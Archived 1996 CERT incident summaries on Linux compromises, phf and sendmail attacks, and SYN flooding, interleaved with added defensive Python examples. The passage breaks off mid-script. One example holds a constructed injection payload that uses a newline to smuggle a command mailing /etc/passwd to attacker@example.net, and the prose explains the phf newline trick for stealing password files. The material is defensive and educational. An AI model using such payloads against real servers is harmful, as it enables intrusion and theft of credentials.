ftp://info.cert.org/pub/CERT_PGP.key
2. Verify the authenticity of the document by checking the PGP
signature. To do this, enter the following command:
% pgp <filename>
You should see a message that includes the statement
Good signature from user "CERT Coordination Center <cert@cert.org>".
Signature made <date>
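The pgp command does the cryptographic check; it helps to know what the file it reads looks like, because a copy that fails to verify is often mangled in transit (a mailer folded a line, an archiver changed line endings) rather than forged. A clear-signed document such as the summaries on this page has the signed text between the BEGIN PGP SIGNED MESSAGE and BEGIN PGP SIGNATURE lines, with every text line beginning with "-" escaped as "- " (which is why the separator lines above read "- ----"), followed by a base64 armor whose final "=XXXX" line is a CRC-24 over the signature bytes. The following added example, written for this summary and not part of PGP, parses that framing and checks the armor CRC. It is an integrity check of the copy only: a matching CRC says nothing about who signed it, and authenticity still requires verifying the signature against the CERT key with pgp. The message in the demo and the bytes standing in for the signature packet are constructed.

```python
"""Added example: parsing a PGP clear-signed document and checking its armor CRC."""
import base64
import binascii
import re

BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
END_SIG = "-----END PGP SIGNATURE-----"


def crc24(data):
    """CRC-24 as used by OpenPGP ASCII armor (poly 0x864CFB, init 0xB704CE)."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def parse_clearsigned(text):
    """Return (signed_text, armor_headers, signature_bytes).

    Raises ValueError if the framing is incomplete or the armor CRC does not
    match the decoded bytes (a mangled copy: fetch it again before concluding
    anything about the signer).
    """
    lines = text.splitlines()
    try:
        i = lines.index(BEGIN_MSG)
        j = lines.index(BEGIN_SIG, i)
        k = lines.index(END_SIG, j)
    except ValueError:
        raise ValueError("not a complete clear-signed message")
    body = lines[i + 1:j]
    while body and re.match(r"^[\w-]+: ", body[0]):   # optional "Hash:" headers
        body.pop(0)
    if body and body[0] == "":
        body.pop(0)
    signed = [l[2:] if l.startswith("- ") else l for l in body]  # undo dash escaping
    armor, headers = lines[j + 1:k], {}
    while armor and ": " in armor[0]:                  # "Version: 2.6.2" and friends
        key, _, val = armor[0].partition(": ")
        headers[key] = val
        armor.pop(0)
    if armor and armor[0] == "":
        armor.pop(0)
    if not armor or not armor[-1].startswith("="):
        raise ValueError("armor missing CRC line")
    crc_line = armor.pop()
    try:
        sig = base64.b64decode("".join(armor), validate=True)
        given = int.from_bytes(base64.b64decode(crc_line[1:], validate=True), "big")
    except binascii.Error as exc:
        raise ValueError("bad base64 in armor: %s" % exc)
    if crc24(sig) != given:
        raise ValueError("armor CRC mismatch: the copy was altered in transit")
    return "\n".join(signed), headers, sig


def check_copy(text):
    """(True, signed_text) if the framing and CRC are intact, else (False, reason)."""
    try:
        return (True, parse_clearsigned(text)[0])
    except ValueError as exc:
        return (False, str(exc))


def armor_signature(sig):
    """Build the armored block PGP would emit around raw signature bytes."""
    b64 = base64.b64encode(sig).decode()
    body = [b64[n:n + 64] for n in range(0, len(b64), 64)]
    crc = base64.b64encode(crc24(sig).to_bytes(3, "big")).decode()
    return "\n".join([BEGIN_SIG, "Version: 2.6.2", ""] + body + ["=" + crc, END_SIG])


# Arbitrary bytes standing in for a signature packet (constructed, not a real signature).
FAKE_SIG = b"\x88\x95\x03\x05" + bytes(range(20))


def demo_message(sig=FAKE_SIG):
    """Constructed clear-signed document with one dash-escaped separator line."""
    text = ["- ---------------------------------------------",
            "Example summary (constructed for this demonstration)",
            "Nothing in this text is a real advisory."]
    return "\n".join([BEGIN_MSG, ""] + text + [armor_signature(sig)])


if __name__ == "__main__":
    ok, result = check_copy(demo_message())
    print("intact" if ok else "damaged", "->", result.splitlines()[0])
```

Real verification adds the step this code cannot do: checking the signature bytes against the CERT public key. Note also that the key itself must be obtained in a way you trust (the FTP site above, the key servers, or a fingerprint confirmed out of band), since a forger who can post a fake advisory can post a fake key with it.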
Recent Activity and Trends
- --------------------------
Since the May CERT Summary, we have seen these continuing trends in
incidents reported to us.
1. Linux root compromises
At least once a week we see reports of Linux machines that suffer
break-ins leading to root compromises. In many of these incidents, the
systems were misconfigured, and/or the intruders exploited well-known
vulnerabilities (for which CERT advisories have been published); the
intruders then installed Trojan horse programs and/or network
monitoring programs (packet sniffers).
If you are running Linux, we strongly urge you to keep up to date with
patches and security workarounds. We recommend that you also review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
Further, you may want to monitor the Linux newsgroups and mailing
lists for security patches and workarounds. More information can be
found at
http://bach.cis.temple.edu/linux/linux-security/
2. Telnetd in Linux systems
We have noticed an increase in the exploitation of a vulnerability in
the telnetd environment on unpatched Linux-based systems. If you have
not patched your system(s) for this vulnerability, we urge you to
review CERT advisory CA-95:14 and install the patch or workaround
provided.
ftp://info.cert.org/pub/cert_advisories/CA-95:14.Telnetd_Environment_Vulnerability
3. Password Cracking
We continue to receive daily reports of unauthorized site access as a
result of compromised accounts and/or "cracked" passwords. For
information about protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
4. Sendmail attacks
Although discussed in previous summaries, we continue to receive
reports each week about intruders who attempt to exploit sendmail
vulnerabilities. We have published several advisories on sendmail. If
you have not addressed the vulnerabilities in sendmail, we urge you to
review these advisories and take appropriate action. All advisories,
including sendmail advisories, can be found at
ftp://info.cert.org/pub/cert_advisories/
In many of these attempts, intruders are trying to obtain
password files. For information on protecting your password files, see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
We have had many questions about when to use the sendmail restricted
shell program (smrsh). You should run smrsh with any UNIX system that
is running sendmail, regardless of vendor or version.
smrsh is now included as part of the current sendmail distribution
(effective with version 8.7.1). We strongly urge you to upgrade to the
latest version of sendmail. See
ftp://info.cert.org/pub/latest_sw_versions/sendmail
5. cgi-bin vulnerabilities
Since our last summary, we've seen an increase in the number of
reports relating to vulnerabilities in cgi-bin programs. Any cgi-bin
program that relies on escape_shell_cmd() to prevent exploitation of
shell-based library calls may be vulnerable to attack. For more
information about cgi-bin vulnerabilities and patches, please see
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
There have been discussions in several public forums about the problem
of general-purpose interpreters being placed in the cgi-bin directory.
If these interpreters are accessible in the cgi-bin directory of a Web
server, then a remote user can execute any command the interpreters
can execute on that server. For more details and patch information,
see
ftp://info.cert.org/pub/cert_advisories/CA-96.11.interpreters_in_cgi_bin_dir
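The first problem above is not that escape_shell_cmd() escaped too few characters; it is that building a shell command line from user input and then escaping it is the wrong approach, because any character the escaper forgets (newline, in the CA-96.06 case) becomes a command separator. The following added example, written for this summary and not taken from the NCSA example code, re-creates the pattern in Python next to the fix: validate the field against what it may legitimately contain, then pass it to the program as a single argument with no shell involved. The escaped character set is the one that routine of the period used, reproduced here as an assumption; the "finger gateway" and the payload are constructed, and the hardened function only builds the argument vector (it runs nothing), so the example is safe to execute anywhere.

```python
"""Added example: escape_shell_cmd()-style escaping versus not using a shell at all."""
import re

# Characters escape_shell_cmd() backslash-escaped (assumed set). Note what is
# missing: newline, which /bin/sh also treats as a command separator.
ESCAPED = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd(s):
    """Backslash-escape 'dangerous' characters, escape_shell_cmd() style."""
    return "".join("\\" + c if c in ESCAPED else c for c in s)


def vulnerable_command(user):
    """The original pattern: build a shell command line and rely on escaping."""
    return "/usr/bin/finger %s" % escape_shell_cmd(user)


def shell_commands(cmdline):
    """How many commands /bin/sh would see in cmdline (split on newline and ';')."""
    return [c.strip() for c in re.split(r"[\n;]", cmdline) if c.strip()]


# What a finger target may look like for this gateway (assumed policy).
USERNAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_valid_user(user):
    """Allow-list check: only names that cannot be mistaken for options or commands."""
    return USERNAME.match(user) is not None


def safe_argv(user):
    """The fix: allow-list the field, then pass it as one argv element, no shell.

    Callers run subprocess.run(safe_argv(user)) (shell=False is the default);
    the string reaches finger verbatim, so no character in it can become a
    second command.
    """
    if not is_valid_user(user):
        raise ValueError("rejected user name %r" % user)
    return ["/usr/bin/finger", user]


# Constructed payload: the newline that escape_shell_cmd() leaves alone.
PAYLOAD = "alice\n/bin/mail attacker@example.net < /etc/passwd"

if __name__ == "__main__":
    cmd = vulnerable_command(PAYLOAD)
    print("escaped command line:", repr(cmd))
    print("commands the shell would run:", shell_commands(cmd))
    print("hardened version accepts payload:", is_valid_user(PAYLOAD))
    print("hardened version, normal input:", safe_argv("alice"))
```

The same reasoning covers the second problem above: an interpreter in cgi-bin is a program whose "arguments" are arbitrary code, so no amount of escaping helps; it must not be reachable by URL at all.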
6. Mail spamming/spoofing attacks
We receive at least three incidents each week of mail spamming and/or
spoofing attacks. For information on responding to and recovering from such
activity, see
ftp://info.cert.org/pub/tech_tips/email_bombing_spamming
ftp://info.cert.org/pub/tech_tips/email_spoofing
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (May 22, 1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.10.nis+_configuration
CA-96.11.interpreters_in_cgi_bin_dir
CA-96.12.suidperl_vul
CA-96.13.dip_vul
ftp://info.cert.org/pub/cert_bulletins/
VB-96.08.sgi
VB-96.09.freebsd
VB-96.10.sco
VB-96.11.freebsd
ftp://info.cert.org/pub/tech_tips/
choose_operating_sys Things to consider when choosing an
operating system for your site
ftp://info.cert.org/pub/tools/
ifstatus Added the ifstatus program
ftp://info.cert.org/pub/vendors/
sun/sun_bulletin_00135 Added bulletin from Sun
Microsystems, Inc.
dec/dec-96.0383 Added bulletin from Digital
Equipment Corporation
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-95:13 Added vendor information for Digital
Equipment Corporation and Silicon
Graphics, Inc.
CA-96.04 Added information about the next
release of BIND
CA-96.08 Added vendor information for Digital
Equipment Corporation, NEC
Corporation, and Data Design Systems,
Inc. Added patch information for
FreeBSD, Inc.
CA-96.09 Added vendor information for Digital
Equipment Corporation. Added pointers
to Silicon Graphics, Inc. release notes
and Sun Microsystems, Inc. patches
CA-96.12 Added vendor information for FreeBSD,
NEC Corporation, and Digital Equipment
Corporation
ftp://info.cert.org/pub/FIRST/
first-contacts Updated contact information
ftp://info.cert.org/pub/latest_sw_versions/
bind Added pointer to version 4.9.4
ifstatus Added pointer to ifstatus
If you use any of the software listed in this directory, we recommend
that you upgrade to the current versions. Among other changes, these
new versions address security weaknesses present in previous versions.
If you have any questions about the software listed in this directory,
please contact the vendor for more information.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCusnVP+x0t4w7BAQF2YAQAzS5ioLEfcEmbAkqldMFuIK22VhyDHF1j
2oDoYNEoXVbxvCG4P2hsQBfLY7gYPDBcQmAtQENre4KgewCChhvcwOLYtHHXWH/j
kwNZbmU4ymPFB4VpJ8VuMDvkWXid7loNbYGaxohUsp3tMM8LubmeAMYgFtt5ot2y
wZR8k/9jwzo=
=BZOQ
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
CERT(sm) Summary CS-96.05
September 24, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Clarification to CS-96.04
- -------------------------
In our previous CERT Summary, we said that the intruder community is
developing new techniques and tools to analyze programs for potential
vulnerabilities even in the absence of source code. We did not mean to imply
that all developers of these techniques in the wider technical community are
members of the intruder community, nor that they intend their work to be used
by the intruder community.
Recent Activity and Trends
- --------------------------
Since the July CERT Summary, we have noticed these trends in incidents
reported to us.
1. Denial of Service Attacks
Instructions for executing denial-of-service attacks and programs to
implement such attacks have recently been widely distributed. Since
this information was published, we have noticed a significant and
rapid increase in the number of denial-of-service attacks executed
against sites.
To learn more about denial-of-service attacks and how to limit them,
see
ftp://info.cert.org/pub/cert_advisories/CA-96.21.tcp_syn_flooding
To monitor and log an attack, you can use a tool such as Argus. For
more information regarding Argus, see
ftp://info.cert.org/pub/tech_tips/security_tools
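The SYN flooding attack described in CA-96.21 fills a listening socket's queue of half-open connections with SYNs from unreachable, usually spoofed, source addresses, so the host stops accepting new connections on that port. The script below is an added example, not code from CERT or from Argus: it parses netstat-style socket lines (a constructed sample is embedded) and reports, per port, how many half-open connections exist, from how many distinct sources, and how many sources lie in address blocks that should never arrive from the Internet (RFC 1918 private space and similar), which is the filtering the advisory's appendix asks border routers to perform. The listen-queue depth of 5 and the Linux-style netstat field layout are assumptions.

```python
import ipaddress
import sys
from collections import defaultdict

# Source blocks that cannot legitimately originate from the Internet: RFC 1918
# private space, loopback, "this network" and multicast. A SYN carrying one of
# these as its source is spoofed or misrouted and should be dropped at the
# border router (ingress filtering).
BOGON_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "0.0.0.0/8", "224.0.0.0/4",
)]

# Constructed sample of `netstat -an` output (Linux field layout assumed):
# a flood against port 80 plus ordinary established sessions.
SAMPLE_NETSTAT = """\
tcp 0 0 192.0.2.10:80 10.0.0.5:1025 SYN_RECV
tcp 0 0 192.0.2.10:80 10.0.0.6:1025 SYN_RECV
tcp 0 0 192.0.2.10:80 172.16.4.9:40001 SYN_RECV
tcp 0 0 192.0.2.10:80 192.168.1.77:1088 SYN_RECV
tcp 0 0 192.0.2.10:80 203.0.113.44:2231 SYN_RECV
tcp 0 0 192.0.2.10:80 203.0.113.45:2232 SYN_RECV
tcp 0 0 192.0.2.10:25 198.51.100.3:3370 ESTABLISHED
tcp 0 0 192.0.2.10:22 198.51.100.8:4410 ESTABLISHED
"""


def is_bogon_source(addr):
    """True if addr falls in a block that is never a valid Internet source."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BOGON_NETWORKS)


def parse_sockets(text):
    """Turn netstat-style lines into (local_port, remote_addr, state) tuples.

    Field order assumed: proto recv-q send-q local remote state.
    Lines that do not fit (headers, UDP, unix sockets) are skipped.
    """
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp"):
            continue
        local, remote, state = f[3], f[4], f[5]
        try:
            lport = int(local.rsplit(":", 1)[1])
        except (IndexError, ValueError):
            continue
        rows.append((lport, remote.rsplit(":", 1)[0], state))
    return rows


def assess_syn_flood(text, backlog=5):
    """Summarise half-open (SYN_RECV) connections per local port.

    backlog is the assumed listen-queue depth; the historical default was 5,
    and once SYN_RECV entries reach it the port refuses further connections.
    Returns {port: {"half_open": n, "distinct_sources": k,
                    "bogon_sources": b, "saturated": bool}}.
    """
    per_port = defaultdict(lambda: {"half_open": 0, "sources": set(), "bogon": 0})
    for lport, raddr, state in parse_sockets(text):
        if state != "SYN_RECV":
            continue
        e = per_port[lport]
        e["half_open"] += 1
        e["sources"].add(raddr)
        if is_bogon_source(raddr):
            e["bogon"] += 1
    return {
        port: {
            "half_open": e["half_open"],
            "distinct_sources": len(e["sources"]),
            "bogon_sources": e["bogon"],
            "saturated": e["half_open"] >= backlog,
        }
        for port, e in per_port.items()
    }


if __name__ == "__main__":
    # Usage: netstat -an | python3 synflood.py   (falls back to the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    for port, r in sorted(assess_syn_flood(text).items()):
        verdict = "backlog saturated, possible SYN flood" if r["saturated"] else "ok"
        print(f"port {port}: {r['half_open']} half-open from "
              f"{r['distinct_sources']} sources, {r['bogon_sources']} from "
              f"bogon space -> {verdict}")
```

A handful of SYN_RECV entries is normal; the signature of the attack is a count that sits at the backlog limit from sources that never complete the handshake, and sources in bogon space are spoofed by definition. BSD-derived netstat prints addresses as 192.0.2.10.80 rather than 192.0.2.10:80, so the port split has to be adapted there. The lasting fixes are the vendor patches CA-96.21 points to, ingress filtering at the border, and, on modern kernels, SYN cookies together with a larger listen backlog.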
2. Continuing Linux Exploitations
We continue to see incidents in which Linux machines are the victims
of break-ins leading to root compromises. In many of these incidents,
the systems were misconfigured and/or the intruders exploited
well-known vulnerabilities for which CERT advisories have been
published.
If you are running Linux, we strongly urge you to keep up to date with
patches and security workarounds. We also recommend that you review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
Further, you may want to monitor the Linux newsgroups and mailing
lists for security patches and workarounds. More information can be
found at
http://bach.cis.temple.edu/linux/linux-security/
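The CA-94:01 advisory referenced above concerns packet sniffers left on compromised hosts, and the ifstatus program added to the CERT tools directory exists because a sniffer puts an interface into promiscuous mode while an intruder's trojaned ifconfig may hide that fact. The following is an added example, not CERT's code and not ifstatus: on Linux the kernel's interface flag word is exposed as a hex value in /sys/class/net/<interface>/flags, where IFF_PROMISC is bit 0x100 (from <linux/if.h>), so the flag can be read straight from the kernel without trusting ifconfig output. The constructed flag lines and the sysfs path are assumptions; the live reader returns nothing on systems without that tree.

```python
import os

# Interface flag bits from <linux/if.h> (the same flag word ifstatus
# retrieves via ioctl on other Unixes).
IFF_UP = 0x1
IFF_PROMISC = 0x100

# Constructed sample in "<interface> <hex flags>" form: eth0 has 0x100 set.
SAMPLE_FLAGS = """\
lo 0x9
eth0 0x1103
eth1 0x1003
"""


def is_promiscuous(flags):
    """True if the IFF_PROMISC bit is set in an interface flag word."""
    return bool(flags & IFF_PROMISC)


def parse_flag_lines(text):
    """Parse '<iface> <hex>' lines into {iface: flags}; malformed lines are skipped."""
    result = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        try:
            result[parts[0]] = int(parts[1], 16)
        except ValueError:
            continue
    return result


def promiscuous_interfaces(flag_map):
    """Names of interfaces whose flag word has IFF_PROMISC set, sorted."""
    return sorted(name for name, flags in flag_map.items() if is_promiscuous(flags))


def read_linux_flags(sysfs="/sys/class/net"):
    """Read every interface's flag word from sysfs; {} where it does not exist."""
    flags = {}
    try:
        names = os.listdir(sysfs)
    except OSError:
        return flags
    for name in names:
        try:
            with open(os.path.join(sysfs, name, "flags")) as fh:
                flags[name] = int(fh.read().strip(), 16)
        except (OSError, ValueError):
            continue
    return flags


if __name__ == "__main__":
    live = read_linux_flags()
    source = live if live else parse_flag_lines(SAMPLE_FLAGS)
    for iface in promiscuous_interfaces(source):
        print(f"{iface}: PROMISC set, look for a sniffer on this host")
```

A promiscuous interface is not proof of a sniffer (a legitimate monitoring tool sets the same bit), but an interface in that state that nobody can account for is exactly the finding the root_compromise tech tip tells you to follow up on. Because this reads the kernel's own flag word, a trojaned ifconfig binary does not affect the result; a kernel-level modification would, which is why a compromised host is rebuilt rather than cleaned.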
3. PHF Exploits
At least weekly, and often daily, we see reports of password files
being obtained illegally by intruders who have exploited a
vulnerability in the PHF cgi-bin script. The script is installed by
default with several implementations of httpd servers, and it contains
a weakness that allows intruders to retrieve the password file for the
machine running the httpd server. The vulnerability is described in
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
Once the intruders retrieve the password file, they may attempt to
crack the passwords found in the file. For information about
protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
4. Software Piracy
We have received frequent reports regarding software piracy since the
last CERT Summary was issued. Although software piracy is beyond the
scope of the mission of the CERT Coordination Center, it is often
associated with compromised hosts or accounts because intruders
sometimes use compromised hosts to distribute pirated software. News
of illegal collections of software circulates quickly within the
underground community, which may focus unwanted attention on a site
used for software piracy.
We encourage you to periodically check your systems for signs of
software piracy. To learn more, please examine our relevant tech tips:
ftp://info.cert.org/pub/tech_tips/anonymous_ftp_abuses
ftp://info.cert.org/pub/tech_tips/anonymous_ftp_config
To learn more about detecting and preventing security breaches, please see
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
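Intruders who stage pirated software on a compromised host need somewhere writable and, ideally, inconspicuous. The audit below is an added example, not CERT's code and not taken from the anonymous_ftp tech tips: it walks an FTP tree (a constructed stand-in is embedded so it runs offline) and reports directories that anyone can write to, plus names chosen to hide from a casual ls (leading dot, dot-runs like "...", leading or trailing whitespace). The name heuristics and the constructed tree are assumptions.

```python
import os
import stat


def disguised_name(name):
    """Names chosen to hide from a casual `ls`: leading dot, all dots, or
    leading/trailing whitespace (heuristics, not an exhaustive list)."""
    stripped = name.strip()
    if stripped == "" or name != stripped:
        return True
    return name.startswith(".") or set(stripped) <= {"."}


def audit_entries(entries):
    """entries: iterable of (relative_path, st_mode).
    Returns [(relative_path, reason)] for entries worth a closer look."""
    findings = []
    for path, mode in entries:
        base = os.path.basename(path.rstrip("/")) or path
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
            findings.append((path, "world-writable directory"))
        if disguised_name(base):
            findings.append((path, "hidden or disguised name"))
    return findings


def collect_entries(root):
    """Walk a real tree (for example ~ftp) and yield (relative_path, st_mode)."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode
            except OSError:
                continue
            yield os.path.relpath(full, root), mode


def summarize(findings):
    """Group findings by reason: {reason: sorted list of paths}."""
    out = {}
    for path, reason in findings:
        out.setdefault(reason, []).append(path)
    return {k: sorted(v) for k, v in out.items()}


# Constructed stand-in for an anonymous FTP tree (not a real site).
CONSTRUCTED_TREE = [
    ("pub", stat.S_IFDIR | 0o755),
    ("pub/README", stat.S_IFREG | 0o644),
    ("incoming", stat.S_IFDIR | 0o1733),            # writable, not listable
    ("incoming/.  ", stat.S_IFDIR | 0o777),         # dot plus trailing spaces
    ("incoming/.  /...", stat.S_IFDIR | 0o777),     # nested "..." directory
    ("incoming/.  /.../game.zip", stat.S_IFREG | 0o666),
]


if __name__ == "__main__":
    import sys
    # Usage: python3 ftpaudit.py /home/ftp   (falls back to the constructed tree)
    entries = collect_entries(sys.argv[1]) if len(sys.argv) > 1 else CONSTRUCTED_TREE
    for reason, paths in summarize(audit_entries(entries)).items():
        for path in paths:
            print(f"{reason}: {path!r}")
```

A directory that is meant to accept uploads (the constructed tree's incoming, mode 1733) should be writable but not listable, so that other anonymous users cannot retrieve what was dropped there; a directory that is both writable and listable is a ready-made distribution point. Disguised names inside such a directory are the usual sign that it has already been found and put to use.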
- ----------------------------------
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (July 23,
1996).
* README Files Incorporated into Advisories
As of August 30, 1996, we no longer put advisory updates into README files. We
now revise the advisories themselves. In addition, we have updated past
advisories with information from their README files. We urge you to check
advisories regularly for updates that relate to your site.
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.14.rdist_vul
CA-96.15.Solaris_KCMS_vul
CA-96.16.Solaris_admintool_vul
CA-96.17.Solaris_vold_vul
CA-96.18.fm_fls
CA-96.19.expreserve
CA-96.20.sendmail_vul
CA-96.21.tcp_syn_flooding
ftp://info.cert.org/pub/cert_bulletins/
VB-96.12.freebsd
VB-96.13.hp
VB-96.14.sgi
VB-96.15.sco
VB-96.16.transarc
ftp://info.cert.org/pub/latest_sw_versions
swatch
ftp://info.cert.org/pub/tech_tips
UNIX_configuration_guidelines These replace the security_info file
intruder_detection_checklist (the CERT Security Checklist).
security_tools
ftp://info.cert.org/pub/vendors/
hp/HPSBUX9607-033 Added Hewlett-Packard bulletin about a
security vulnerability in expreserve.
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-96.02.bind In the appendix, updated Sun
Microsystems, Inc. patch information.
In section I, added information about
the next release of bind and the
IsValid program.
CA-96.08.pcnfsd Updated URL for IBM Corporation,
updated Hewlett-Packard Company patch
information, and modified NEC
Corporation patch information.
CA-96.09.rpc.statd Updated URL for IBM Corporation,
removed a workaround for SunOS 4.x
(patches now available), updated
information on Hewlett-Packard
Company, and added patch information
for NEC Corporation. Also updated
opening paragraph.
CA-96.14.rdist_vul In Appendix A, added note under
Silicon Graphics, Inc. about using the
find command, updated the
Hewlett-Packard Company entry, added
information about Digital Equipment
Corporation, and added an IBM
Corporation URL.
CA-96.15.Solaris_KCMS_vul In Introduction, added information
about Solaris 2.5.1.
CA-96.18.fm_fls Added vendor information to Appendix A.
Added Section III.B, which provides
another possible solution to the
problem.
CA-96.19.expreserve In Appendix A, added information for
Silicon Graphics Inc. and Sun
Microsystems, Inc.
CA-96.20.sendmail_vul Added to Sec. III.B instructions on
configuring sendmail at sites that use
'&' in the gecos field of /etc/passwd.
Added to Sec. III.C a note on uid for
"mailnull" user. In the appendix, added
information from FreeBSD, Inc. and
Berkeley Software Design, Inc. (BSDI).
ftp://info.cert.org/pub/FIRST
first-contacts
ftp://info.cert.org/pub/latest_sw_versions
rdist-patch-status Updated information for
Hewlett-Packard Company and NeXT
Software, Inc. Updated
rdist version information in
Section II.G.
sendmail
ftp://info.cert.org/pub/tech_tips
root_compromise
- ---------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMkhCfHVP+x0t4w7BAQFR5gQAtYvbKLJAbTzfRizblM9mbl/4oLfnsqdQ
HcX8KKDNAtVd2DWKGEsq7U7v9w8KyzDtVpRFba8VSsVmpzixzxnbZSifwyfkcuX9
x2xbQ1SVWBjep399HkbYtS0Y3C0RdCo9p/uxdB5/GkZqD3NMdPoBvFf+j/H6376w
tDcheNKNobk=
=DZgd
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
CERT(sm) Summary CS-96.06
November 26, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ----------------------------------------------------------------------------
Recent Activity
- ---------------
Since the September CERT Summary, we have noticed these continuing trends
in incidents reported to us.
1. cgi-bin/phf Exploits
We continue to see frequent reports of attempts to exploit the vulnerability
in the CGI example program "phf". The phf program, which is installed by
default with several implementations of httpd servers, contains a weakness
that can allow intruders to execute arbitrary commands on the server. The
most common attack involves an attempt to retrieve the httpd server's
/etc/passwd file, and sample scripts for exploiting this vulnerability in phf
have been widely posted on the Internet.
While we are encouraged to see that the majority of the recently reported
attacks have failed (because the attacked sites had already removed the phf
program), the steady reports of continuing attacks indicate that these phf
exploits are still being widely attempted.
For more information about this vulnerability, see
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
For related information about protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
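The phf item in the September summary (CS-96.05, item 3) and this item describe the same weakness, so one added example serves both; it is not code from CERT, NCSA or Apache. phf built a shell command from form input after passing it through a metacharacter-escaping routine. That routine escaped the usual shell metacharacters but not newline, so a query carrying %0a followed by a command had that command executed by the shell as a second command line, which is how /etc/passwd was fetched. The vulnerable/hardened pair below models that routine (the escaped character set is an assumption reconstructed from the NCSA-era escape_shell_cmd(), and the ph command line is an assumed form), and the log scanner then flags such requests in constructed common-log-format lines, distinguishing attempts that were served from those that failed because phf was already gone.

```python
import re
from urllib.parse import unquote

# Shell metacharacters the escaping routine knows about (assumption modelled on
# the NCSA-era escape_shell_cmd()). Newline is absent, which is the whole bug.
SHELL_META = set('&;`\'"|*?~<>^()[]{}$\\')


def escape_shell_cmd_vulnerable(s):
    """Backslash-escape known metacharacters; a newline passes through untouched."""
    return "".join("\\" + c if c in SHELL_META else c for c in s)


def escape_shell_cmd_hardened(s):
    """Refuse control characters instead of trying to enumerate every bad byte."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in s):
        raise ValueError("control character in shell argument")
    return escape_shell_cmd_vulnerable(s)


def hardened_rejects(s):
    """True if the hardened escaper refuses s."""
    try:
        escape_shell_cmd_hardened(s)
    except ValueError:
        return True
    return False


def shell_commands(cmdline):
    """Model the part of sh that matters here: an unescaped newline ends one
    command and starts the next. Returns the commands sh would run in turn."""
    commands, cur, i = [], "", 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and i + 1 < len(cmdline):   # escaped char: keep pair as-is
            cur += cmdline[i:i + 2]
            i += 2
            continue
        if c == "\n":
            commands.append(cur)
            cur = ""
        else:
            cur += c
        i += 1
    if cur:
        commands.append(cur)
    return commands


def phf_command_line(alias, escape=escape_shell_cmd_vulnerable):
    """Command phf handed to popen() for a Qalias query (assumed form)."""
    return "/usr/local/bin/ph -m alias=" + escape(alias)


# Detection side: common log format, constructed sample lines.
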